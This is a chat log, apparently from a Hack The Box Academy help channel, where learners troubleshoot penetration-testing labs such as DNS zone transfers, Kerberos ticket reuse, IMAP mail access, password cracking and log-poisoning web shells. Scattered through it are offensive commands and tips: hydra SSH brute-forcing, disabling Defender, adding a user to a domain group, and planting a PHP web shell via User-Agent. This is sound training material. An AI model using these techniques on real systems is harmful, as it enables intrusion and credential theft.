Note if you didn't delete your screenshot, mod probably did bc spoiler
It's alright go share, just keep in mind you may need to edit out things that may reveal answers
Well did you see '1 exists' after selecting it?
Then all you need to do is fetch its body[]
You can do the fetch all command too if you wanna see why I don't recommend it
The command is <prefix> fetch <id> <type>
But nothing is needed in the square brackets
That's only if you're trying to be more specific (see the articles I linked)
If there's only 1 email why are you trying to select the second non-existent one
cough
More specifically the <id> is the sequential list
Eh
The easier way is using an email client
I mean it helps get you banners to answer a couple questions
It's also familiarity
You're used to GUI applications
So terminal seems tedious
But also if you don't know what you're doing: it's rougher bc you can't just click around and find out
root
toor
toor
Hello. I am working through the Footprinting Module and running into an issue on the DNS section with the first question:
"Interact with the Target DNS using its IP address and enumerate the FQDN of it for the inlanefreight.htb domain"
I have added the generated IP and domain to the /etc/hosts file but when I try to run
"dig ns inlanefreight.htb@(Generated IP)"
I always receive a NXDOMAIN status
I even tried nslookup and it gave me the same error
Would really appreciate some help
Thank you
Are you connected to the VPN? Also, be sure to format any commands you are entering as code by wrapping them in single or triple-backticks to make it easier to see what you are attempting.
I am using the pwnbox and thank you I will make sure to do that
There should be a space between the domain name and the @[Target IP].
agh im dumb lol thank you so much for that
You are not dumb. You are learning, just like we all are.
I appreciate the help
i cant believe i made it here with constant dedication, now is only the hard modules left. I had no idea how long this would take and how much effort is required.
yes eventually
ive been trying to finish all the modules first then tryhard in the boxes, as a refresher and practice before the exam in like 3 months.
im not sure its best option but at least its something, and there are like zero CTFs in my area.
i have 0 background in the field and this is my first cert
so just learning the maximum to not get confused works best for me
Hello I need help for skill assessment 2
Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.
I got the credentials but I dont know ||how I change the admin password||
which module
try powerview
always CTFs going on online, still fun to do even if you're not playing to win
AD Enumeration & Attacks
i just need to find people to team up with.
Try || Add-DomainGroupMember ||
can anyone help me with Password Attacks > Pass the ticket from linux module with this question? Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
i found the AES256 hash, but i didn't find NTLM
@latent sigil can I DM you ?
sure
The instructions in the module are almost exactly what you have to do, just make sure to take a closer look at where on the file system you find that AES256
i found the aes256 with this .kt
the question says to look in the cronjobs, that's where I looked
😢
can you help me?
You have found a spot where carlos is storing tickets. Maybe there are other tickets there?
you have sent the same screenshot twice
enumeration is important 🙃
maybe a stupid question about windows, but is this done by defender and is the solution killing defender or is there an other way?
Real Time Protection is responsible for this. Disable it and it will not delete your dll anymore
Did anyone have this section take a while? like over 15 min? https://academy.hackthebox.com/module/147/section/1391
Be sure to make use of the downloadable "Resources" available at the top-right corner of the page and follow the module instructions to create the mutated wordlist.
Directions are pretty straightforward. I ran hashcat to mutate the wordlist - hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
then ran/running:
hydra -l sam -P mut_password.list ssh://$ip
Are the resources different in each section? I downloaded them in a section before. should I download again?
No, they're the same. If it looks like it might take a completely unreasonable amount of time, there is probably a better way. Enumeration is key.
Ah I see now 
question: What is a good tool to make notes about networks and their connections, something to visualize it.
Wireshark?
Let me enhance the question. For the tunneling and pivoting i will start the skills assessment. It would be nice to draw out the network i discover with any credentials in a nice program, rather than drawing on my desk. is there such a program or do i fall back on powerpoint ;d
Now I know what you mean.
Check out Visio or draw.io
thanks
Could someone help me with the Pass the Ticket section, please? Particularly the last question, "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)."
I have used linikatz and it provided me with the below
||Ticket cache: FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
Default principal: LINUX01$@INLANEFREIGHT.HTB
I then used this kinit linux01@INLANEFREIGHT.HTB -k -t /var/lib/sss/db/ccache_INLANEFREIGHT.HTB||
but doesn't work
500 Internal Server Error
anyone?
i'm getting this error message
Send screenshots of your process
how do you censor?
or do you think it will be ok?
anyone can help me? 😢
How did you get the flag file name ?
when I do &cmd=ls /
I did it once and it worked
but if I do the cat command it doesnt
and then nothing works
Because you are resending the webshell payload.
Send the webshell once to the logfile, then use it.
restart the lab 😉
can you help me?
With what?
"Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_)." for password attacks modules
I have used linikatz and it provided me with the below
||Ticket cache: FILE:/var/lib/sss/db/ccache_INLANEFREIGHT.HTB
Default principal: LINUX01$@INLANEFREIGHT.HTB
I then used this kinit linux01@INLANEFREIGHT.HTB -k -t /var/lib/sss/db/ccache_INLANEFREIGHT.HTB||
but doesn't work
Let me check my notes
it didnt work
You used the wrong Ticket
hmmmmmm
in the notes I found this
Where am I going wrong?
First thing I do is refresh the access.log page to intercept in Burp
Then put in the PHP web shell in the User Agent
Press Forward
Then I refresh the page again to enter RCE in Burp
||Intercept the request with Burp.
Send this request twice to the repeater.
In the first tab you adjust the user agent. Send it exactly once.
In the second tab you send the cmd=... command.||
Search for keytab on the system.
I did exactly this and still unfortunately nothing
Restart the Lab and start from scratch.
One wrong character in the log and the log is broken -> Error 500
I'm confused
ok but I have tried restarting like 20 times lol
What you are looking for is visible in your print screen.
hmmmm
Can someone help me use the matplotlib module?
Hi any tip fixing this problem when doing RDP in File Transfer Module?
How can I do that?
THIS IS SICK MAN
now I use kinit?
oh my GOD I forgot ONE apostrophe?????
Yes
my head is bursting with pain right here lol
this module is so confusing
Send me a DM to not spoil here
ok
I was trying to make a graphical program output but it did not work @elfin cedar can I dm you an example?
hi someone can help me with this question ? Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___
in https://academy.hackthebox.com/module/214/section/2285 Hunting For Stuxbot ?
thanks, and if i have understood i have to search in script block after execution of query for a word starting by P and contains V like P * V * ?
No, P....V.... is the tool.
But if you look at the script block, you will find commands that were used. If you don't know the tool, then search the internet for this command. This will lead you to the tool you are looking for.
Oh ok thanks !!
Hint: ||There is even a module about this tool in the Academy||
yes i found it thanks again!
I see we’re all having fun with Kerberos tickets today.
Gotta love the learning process!
you've got the password wrong i think
or u can try escaping the exclamation mark
Guess I don't get it. I tried CME, hydra and used the base64.rule in hashcat but I can't get any of the tools to finish getting sam's password https://academy.hackthebox.com/module/147/section/1391
ha nm - #modules message
hey guys, can I think in the Module Password Attack under Lab Hard, the file sharing features is not allowed in the target machine?
I cannot share a folder with xfreerdp and remmina even
I'm not using kali
yup but, when I try to copy a file from Windows (target) to my attacker machine I got an error message
try this attack machine python3 -m http.server
So the xfreerdp /drive: option doesn't work?
or this,,,
Hmm
unfortunately not
one sec I have a resource
Idk I didn't have issues when I ran it
¯_(ツ)_/¯
So I'm not gonna be of help troubleshooting
Could just need a lab reset to try again
that's why I'm thinking maybe the feature is not allowed in the target
Usually wait a few minutes
Fileshare is allowed
And drive mounting is absolutely available
from attack sudo impacket-smbserver share . -smb2support -username saul -password goodman
hmm ok, so I'm not sure what's happening
You're probably doing something incorrectly
then on windows \\AttackmachineIP\share
ok., let me share the error message
one sec
cool
see if it works
Btw if you wrap it in the backtick it doesn't do the escape character thing
\\see
Has anyone completed the Citrix breakout section of Windows PrivEsc module? I'm trying to access the share on 10.13.38.95 via Paint in order to get powerup.ps1 and UAC-Bypass.ps1 but it says the share cannot be found?
I was just wondering, I am not in a module but I wanted to try and do a box related to the one I just completed. I just spawned the machine but when I enter it into the web browser it says connection failed. I dont think the hosts file needs to be edited does it?
oh man
you mean I need to enumerate for a subdomain maybe?
isnt that what you put in the hosts file along with the ip address?
If it is a retired machine you can check the ippsec video on YouTube
thank you
maybe
Sometimes while hacking stuff you may need to hack things too
when he enters the ip address it just goes straight to the page its supposed to be
man I thought I was ready to just test out one box
Are you on the academy vpn or the vpn for the box?
I am on the vpn for the box but I dont wanna clutter up the module chat sorry
On the Network Enumeration with NMAP modules, the Medium lab, does anyone know if there is a way to find the flag using a VM? I can get it using the pwnbox but can't seem to figure out why it does not work with the VM. Thanks!
Hello, I need some help with Information Gathering - Web Edition. Active subdomain Enumeration Question 4: What is the FQDN of the IP 10.10.34.136. This address doesn't show up in any of my dns enumeration. I've tried a reverse lookup with dig, nslookup and host and I'm coming up empty. What am I missing?
Have you tried zone transfers?
I have
dig @10.129.250.101 inlanefreight.htb axfr
nothing in there for the 10.10.34.136 address
have you tried the transfers with other subdomains?
hahaha I knew I was overlooking something stupid. I appreciate the help man
no problem, that one I also had issues when using my vm, but I think that particular question worked fine with the VM, if I recall correctly anyway...
This has probably been the course I've struggled most with so far, outside a bit of the web proxy stuff. But I've learned a lot - this was the first time I had to break down and ask for help
I found that one pretty challenging myself. Something with the transfer is hard to wrap my head around
Hi i'm stuck in module attacking common service SQL
can't connect to mssql
- try mssqlclient in my parrot
- try mssqlclient in pwnbox
- try sqsh in pwnbox
Solved it. If anyone can't import UAC Bypass and Powerup.ps1 like me, what I did was I copied the code from both files on my Kali, made two new text files on the citrix machine (PowerUp.ps1, UAC-Bypass.ps1) and then pasted the code into them. The commands they give you on HTB Academy to execute the tools might not work but if you google for different commands to execute the files, you'll get your answer. This method is pretty scuffed but hopefully they fix the machine or something.
Hello guys.
I did this one a few days ago and it seemed to work fine, although it was slow. You need to enter the share through the bottom text field, not the top.
Good on you for finding an alternative route though
did that and it still wouldn't find the share
i didnt reset my machine though so maybe that might have done the trick
check your username
oh ya typo thanks,
works on pwnbox, so there is a problem in my own parrot mssqlclient
Did you start the smbserver?
yep
No clue then
I need help on MonitorsTwo machine, can someone DM me please
guys, any idea why hashcat is giving me this error with this command:
hashcat -a 0 -m 13400 login.hash ~/<dictionaryPath>/mut_password.list
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>
and I've not been able to crack the password
any hint, idea..???
check your hash mode if it is correct
Is this like the general chat
hmm looks like based in this picture, the hash not belong to any of the possible options
13400 mode should work as that is for keepass
It might just be taking a minute
Read #welcome
🕰️
lol
When I put the ip address of this box into the address bar it says Secure Connection Failed. I don't even know what, if anything, I need to put in the hosts file. I am just trying out a box that is recommended after the doing the File Inclusion module (Beep).
<secure> are you doing http://<IP>
Learn more about HTTPS-Only Mode which forces all connections to websites to use HTTPS.
I mean yes I did do https
Are you being told to attack a specific domain?
I haven't done the file inclusion module
oh dang
you were the first to ever help me
spawned target yes
I peeked at a video walkthrough and they were able to accept the security risk through Firefox but I dont get an option.
Its just a general question
I am connected to the vpn
right I dont get that
I looked at ippsec's video and when he put the ip address in the browser the page loaded without any issue
I have no idea 😭
There is no option to add a security exception to bypass this type of error.
it says lol
I thought it was something simple I am missing
as soon as I spawn the machine I get an error
Its always something
I understand this says disable but the principle should be the same
This is more of a firefox error than anything
wow
ily
that link said to change the "tls" minimum value in Firefox to 2, but that didn't work, so I changed even lower to 1 and it popped
thank you @fathom pendant
You wanna know how I found it? By googling
It's a useful skill to learn
and you twist the knife!!
Hello! I'm stuck at the DNS section of the Attacking Common Services module. I found a few other subdomains and I tried doing AXFR zone transfers but I keep getting "transfer failed" with dig.
tbh i feel too fucking stupid to understand this. even as someone who has never done this before it looks like to me i am trying to do calculus in arabic upside down
should i be completing my security+ before even going through the hack the box academy ?
It looks like my dad
Do the infosec Fundamentals path first
still stuck... can I DM someone who has already solved this module
I honestly don't even know what I'm doing lol
It helps if you provide the command you're using. You're most likely not specifying the ip
Complete information security foundation path first it can make things easier for you
You will get the toolset that you need to use accordingly
That's where you fucked up
You need to specify the name server with @ using dig
Try dig axfr subdomain @ip
Should probably delete this message btw as it's a spoiler
I got it. Thank you so much!!
You fundamentally misunderstood how dig works, it happens
But basically it's dig request target @nameserver/ip
ty! this is going in my notes 🙂
Similarly nslookup request $target $nameserver
@sly kelp @fathom pendant oh I see. I was doing whatever it said to start on with the Pen Test Tiers and I was like HUH
Those are mainly for people who are interested in/have base knowledge of cyber and want to do an offensive role
ohhh yeah im like starting from ground 0
Then I suggest to get your feet more wet as well places like tryhackme
As they are super noob friendly
fire!
Yes I started with Web security almost 2 years ago so I knew foundational knowledge but for some people it gets really difficult if you have no CTF experience or something, that's why you should follow the paths
And also https://academy.hackthebox.com/module/details/9 is a good way to get in the mindset of how we tackle it. Taking notes though is highly encouraged
Oh nice i saw this one in the info sec fundamentals
thank you guys i literally had no idea and was getting super frusterated
frustrated
Most of the people that are "new" to this have some experience with Linux and windows, especially navigating
well i appreciate it
If you ever need module assistance just ask in here with an example of what you tried, and what you're struggling with
Mhm
Most of the people that have completed the modules know what user you're talking about with first letter then * for instance j*, k*
In context of the modules we know where you're at
hello! I was stuck on the DNS section of "attacking common services" a few hours ago, now I'm stuck at the Mail section. The questions is: "Access the email account using the user credentials that you discovered and submit the flag in the email as your answer."
I have the username, have the password, and connected to IMAP using telnet. However, I can find only one email and there doesn't seem to be a flag in there... the email body just says "Password change". am I missing something?
Have you read the full body[]
That looks like it's just the title of the email
okay I'm gonna try fetching all
There's a reason I linked the post I made to an article with some useful commands, one related to fetch
Perhaps fetching body[] is more useful
As you can see. You have a bunch of "nil" data that the "all" command isn't parsing
I got it. I really need to pay more attention when doing these
The fetch all is useful for getting data info
It's not really mentioned in the footprinting module
it's the second time you've helped me today. Thank you dude ❤️
The non-cli method is using an email client like evolution
I'm gonna try installing that. Saw Ippsec using it before too. It's not on the Pwnbox by default
thanks
which one? the one coming out?
are you doing cpts path too
hi can anyone help me with virtualbox and thb how connect vpn to website i trying now but it doesn't work
What OS are you running?
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 10.129.145.53 Port 80</address>
</body></html>
and website show me apache2 ubuntu
you have Parrot running on Virtualbox?
hello guys ,i have a problem need to ask
I think the best way is to complete the Setting Up module
